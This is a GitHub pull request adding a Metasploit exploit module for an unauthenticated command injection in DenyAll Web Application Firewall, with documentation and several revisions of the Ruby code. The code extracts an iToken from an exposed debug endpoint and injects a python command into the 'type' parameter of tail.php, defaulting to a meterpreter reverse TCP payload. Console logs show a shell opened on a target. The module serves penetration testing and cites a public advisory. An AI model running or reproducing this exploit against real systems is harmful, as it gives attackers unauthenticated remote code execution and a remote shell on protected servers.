### PR TITLE
Adding DenyAll Web Application Firewall RCE module

### DIFF
--- a/documentation/modules/exploit/linux/http/denyall_waf_exec.md
+++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md
@@ -1,0 +1,37 @@
+## Vulnerable Application
+
+This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
+
+**Vulnerable Application Installation Steps**
+
+It's possible to have trial demo for 15 days at Amazon Marketplace.
+[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
+
+You just need to follow instruction above URL.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+```
+msf > use exploit/linux/http/denyall_exec 
+msf exploit(denyall_exec) > 
+msf exploit(denyall_exec) > set RHOST 35.176.123.128
+RHOST => 35.176.123.128
+msf exploit(denyall_exec) > set LHOST 35.12.3.3
+LHOST => 35.12.3.3
+msf exploit(denyall_exec) > check
+[*] 35.176.123.128:3001 The target appears to be vulnerable.
+msf exploit(denyall_exec) > exploit 
+
+[*] Started reverse TCP handler on 35.12.3.3:4444 
+[*] Extracting iToken value from unauthenticated accessible endpoint.
+[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
+[*] Trigerring command injection vulnerability with  iToken value.
+[*] Sending stage (40411 bytes) to 35.176.123.128
+[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
+
+meterpreter > pwd
+/var/log/denyall/reverseproxy
+meterpreter >
+```

--- a/documentation/modules/exploit/linux/http/denyall_waf_exec.md
+++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md
@@ -1,8 +1,6 @@
 ## Vulnerable Application
 
-This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
-
-**Vulnerable Application Installation Steps**
+This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
 
 It's possible to have trial demo for 15 days at Amazon Marketplace.
 [https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
@@ -12,6 +10,18 @@ You just need to follow instruction above URL.
 ## Verification Steps
 
 A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] `use use exploit/linux/http/denyall_exec`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `iToken` value extraction.
+- [ ] **Verify** that you are getting `meterpreter` session.
+
+## Scenarios
 
 ```
 msf > use exploit/linux/http/denyall_exec 

--- a/modules/exploits/linux/http/denyall_waf_exec.rb
+++ b/modules/exploits/linux/http/denyall_waf_exec.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "DenyAll Web Application Firewall Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a
+        terminal command under the context of the web server user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => true,
+          'RPORT' => 3001,
+          'Payload'  => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [[ 'Automatic', { }]],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 19 2017",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Denyall WAF', '/'])
+      ]
+    )
+  end
+
+  def check
+    # Get iToken from unauthenticated accessible endpoint
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
+      'vars_get' => {
+        'applianceUid' => "LOCALUID",
+        'typeOf' => "debug"
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?("iToken")
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    print_status("Extracting iToken value from unauthenticated accessible endpoint.")
+    # Get iToken from unauthenticated accessible endpoint
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
+      'vars_get' => {
+        'applianceUid' => "LOCALUID",
+        'typeOf' => "debug"
+      }
+    })
+
+    if res && res.code == 200 && res.body.include?("iToken")
+      iToken = res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
+      print_good("Awesome. iToken value = #{iToken}")
+    else
+      fail_with(Failure::Unknown, "Didn't receive response from target server.")
+    end
+
+    # Accessing to the vulnerable endpoint with valid iToken
+    print_status("Trigerring command injection vulnerability with  iToken value.")
+
+    r = rand_text_alpha(5 + rand(3));
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
+      'vars_post' => {
+        'iToken' => iToken,
+        'tag' => "tunnel",
+        'stime' => r,
+        'type' => "#{r}$(python -c \"#{payload.encoded}\")"
+        }
+    })
+
+  end
+end

--- a/modules/exploits/linux/http/denyall_waf_exec.rb
+++ b/modules/exploits/linux/http/denyall_waf_exec.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "DenyAll Web Application Firewall Remote Code Execution",
       'Description'    => %q{
-        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a
+        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
         terminal command under the context of the web server user.
       },
       'License'        => MSF_LICENSE,
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Denyall WAF', '/'])
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
       ]
     )
   end
@@ -51,8 +51,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
       'vars_get' => {
-        'applianceUid' => "LOCALUID",
-        'typeOf' => "debug"
+        'applianceUid' => 'LOCALUID',
+        'typeOf' => 'debug'
       }
     })
 
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Get iToken from unauthenticated accessible endpoint
-    print_status("Extracting iToken value")
+    print_status('Extracting iToken value')
     token = get_token
 
     if token.nil?
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
-    print_status("Trigerring command injection vulnerability with  iToken value.")
+    print_status('Trigerring command injection vulnerability with iToken value.')
     r = rand_text_alpha(5 + rand(3));
 
     send_request_cgi({
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
       'vars_post' => {
         'iToken' => token,
-        'tag' => "tunnel",
+        'tag' => 'tunnel',
         'stime' => r,
         'type' => "#{r}$(python -c \"#{payload.encoded}\")"
         }

--- a/modules/exploits/linux/http/denyall_waf_exec.rb
+++ b/modules/exploits/linux/http/denyall_waf_exec.rb
@@ -45,8 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check
-    # Get iToken from unauthenticated accessible endpoint
+  def get_token
+    # Taking token by exploiting bug on first endpoint.
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
@@ -57,41 +57,42 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 200 && res.body.include?("iToken")
-      return Exploit::CheckCode::Appears
+      res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
     else
-      return Exploit::CheckCode::Safe
+       nil
+    end
+  end
+
+  def check
+    # If we've managed to get token, that means target is most likely vulnerable.
+    token = get_token
+    if token.nil?
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Appears
     end
   end
 
   def exploit
-    print_status("Extracting iToken value from unauthenticated accessible endpoint.")
     # Get iToken from unauthenticated accessible endpoint
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
-      'vars_get' => {
-        'applianceUid' => "LOCALUID",
-        'typeOf' => "debug"
-      }
-    })
+    print_status("Extracting iToken value")
+    token = get_token
 
-    if res && res.code == 200 && res.body.include?("iToken")
-      iToken = res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
-      print_good("Awesome. iToken value = #{iToken}")
+    if token.nil?
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
     else
-      fail_with(Failure::Unknown, "Didn't receive response from target server.")
+      print_good("Awesome. iToken value = #{token}")
     end
 
-    # Accessing to the vulnerable endpoint with valid iToken
+    # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
     print_status("Trigerring command injection vulnerability with  iToken value.")
-
     r = rand_text_alpha(5 + rand(3));
 
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
       'vars_post' => {
-        'iToken' => iToken,
+        'iToken' => token,
         'tag' => "tunnel",
         'stime' => r,
         'type' => "#{r}$(python -c \"#{payload.encoded}\")"


### PR DESCRIPTION
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/denyall_waf_exec`
- [x] Set `RHOST`
- [x] Set `LHOST`
- [x] Run `check`
- [x] **Verify** that you are seeing `The target appears to be vulnerable.`
- [x] Run `exploit`
- [x] **Verify** that you are seeing `iToken` value extraction.
- [x] **Verify** that you are getting `meterpreter` session.

```
msf > use exploit/linux/http/denyall_exec 
msf exploit(denyall_exec) > 
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit 

[*] Started reverse TCP handler on 35.12.3.3:4444 
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with  iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```

Here is the advisory and technical details about that vulnerability. 
[https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/](https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/)
